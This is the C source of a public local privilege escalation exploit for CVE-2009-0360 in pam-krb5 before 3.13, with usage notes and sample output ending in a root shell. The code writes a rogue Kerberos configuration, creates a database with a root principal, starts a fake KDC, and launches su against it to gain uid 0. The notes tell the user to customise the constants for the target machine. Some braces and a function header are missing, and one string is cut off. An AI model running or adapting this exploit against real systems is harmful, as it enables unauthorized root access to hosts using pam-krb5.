pam-krb5 versions below 3.13 local privilege escalation exploit.
* cve-2009-0360.c
* pam-krb5 < 3.13 local privilege escalation
* Jon Oberheide <>
* Information:
* pam-krb5 before 3.13, when linked against MIT Kerberos, does not properly
* initialize the Kerberos libraries for setuid use, which allows local
* users to gain privileges by pointing an environment variable to a
* modified Kerberos configuration file, and then launching a PAM-based
* setuid application.
* Usage:
* $ gcc cve-2009-0360.c -o cve-2009-0360
* $ ./cve-2009-0360
* [+] creating krb5.conf
* [+] creating kdc.conf
* [+] creating kerberos database
* Loading random data
* Initializing database '/tmp/cve-2009-0360/principal' for realm 'TEST.COM',
* master key name 'K/M@TEST.COM'
* [+] adding principal root@TEST.COM
* Authenticating as principal root@TEST.COM with password.
* Enter KDC database master key:
* WARNING: no policy specified for root@TEST.COM; defaulting to no policy
* Principal "root@TEST.COM" created.
* [+] launching krb5kdc on
* [+] launching su with fake KDC configuration
* [+] enter "root" at the password prompt
* Password:
* # id
* uid=0(root) gid=0(root) ...
* Notes:
* This exploit will result in local privilege escalation on hosts that use
* the pam-krb5 module for su authentication. Check the su and system-auth
* PAM configuration files in /etc/pam.d to determine if pam-krb5 is in use.
* Some customization of the defined constants and paths may be necessary
* for your environment. Be sure to set FAKE_KDC_HOST to the IP address of
* an active non-loopback interface on the target machine.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#define REALM "TEST.COM"
#define FAKE_KDC_HOST ""
#define FAKE_KDC_PORT "6666"
#define PRINCIPAL_NAME "root"
#define PRINCIPAL_PASS "root"
#define TMP_DIR "/tmp/cve-2009-0360"
#define KUTIL_PATH "/usr/sbin/kdb5_util"
#define KADMIN_PATH "/usr/sbin/kadmin.local"
#define KRB5KDC_PATH "/usr/sbin/krb5kdc"
#define KRB5_CONF \
"[libdefaults]\n\tdefault_realm = " REALM "\n\n[realms]\n\t" REALM \
" = {\n\t\tadmin_server = " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n\t\t" \
"default_domain = " REALM "\n\t\tkdc = " FAKE_KDC_HOST ":" FAKE_KDC_PORT \
"\n\t}\n\n[domain_realm]\n\t." REALM " = " REALM "\n\t" REALM " = " REALM
#define KDC_CONF \
"[kdcdefaults]\n\tkdc_ports = " FAKE_KDC_PORT "\n\n[realms]\n\t" REALM \
" = {\n\t\tdatabase_name = " TMP_DIR "/principal\n\t\tadmin_keytab = " \
"FILE:" TMP_DIR "/kadm5.keytab\n\t\tacl_file = " TMP_DIR "/kadm5.acl" \
"\n\t\tkey_stash_file = " TMP_DIR "/stash\n\t\tkdc_ports = " FAKE_KDC_PORT \
"\n\t\tmax_life = 10h 0m 0s\n\t\tmax_renewable_life = 7d 0h 0m 0s\n\t}"
int ret;
FILE *fp;
char *err;
ret = mkdir(TMP_DIR, 0755);
if (ret == -1 && errno != EEXIST) {
err = "cannot create TMP_DIR";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
return 1;
printf("[+] creating krb5.conf\n");
fp = fopen(TMP_DIR "/krb5.conf", "w");
if (!fp) {
err = "cannot open krb5.conf";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
return 1;
fwrite(KRB5_CONF, 1, strlen(KRB5_CONF), fp);
printf("[+] creating kdc.conf\n");
fp = fopen(TMP_DIR "/kdc.conf", "w");
if (!fp) {
err = "cannot open kdc.conf";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
return 1;
fwrite(KDC_CONF, 1, strlen(KDC_CONF), fp);
printf("[+] creating kerberos database\n");
ret = system(KUTIL_PATH " create -d " TMP_DIR "/principal -sf " TMP_DIR \
"/stash -r " REALM " -s -P \"\"");
if (WEXITSTATUS(ret) != 0) {
err = "kdb5_util command returned non-zero";
printf("[-] Error: %s, continuing exploit anyway\n", err);
printf("[+] adding principal " PRINCIPAL_NAME "@" REALM "\n");
ret = system("echo \"\" | " KADMIN_PATH " -m -p " PRINCIPAL_NAME "@" REALM \
" -d " TMP_DIR "/principal -r " REALM " -q \"add_principal " \
if (WEXITSTATUS(ret) != 0) {
err = "kadmin.local command returned non-zero";
printf("[-] Error: %s, continuing exploit anyway\n", err);
printf("[+] launching krb5kdc on " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n");
ret = system("KRB5_KDC_PROFILE=\"" TMP_DIR "/kdc.conf\" " KRB5KDC_PATH \
" -d " TMP_DIR "/principal -r " REALM);
if (WEXITSTATUS(ret) != 0) {
err = "krb5kdc command returned non-zero";
printf("[-] Error: %s, continuing exploit anyway\n", err);
printf("[+] launching su with fake KDC configuration\n");
printf("[+] enter \"" PRINCIPAL_PASS "\" at the password prompt\n");
system("KRB5_CONFIG=\"" TMP_DIR "/krb5.conf\" su");
return 0;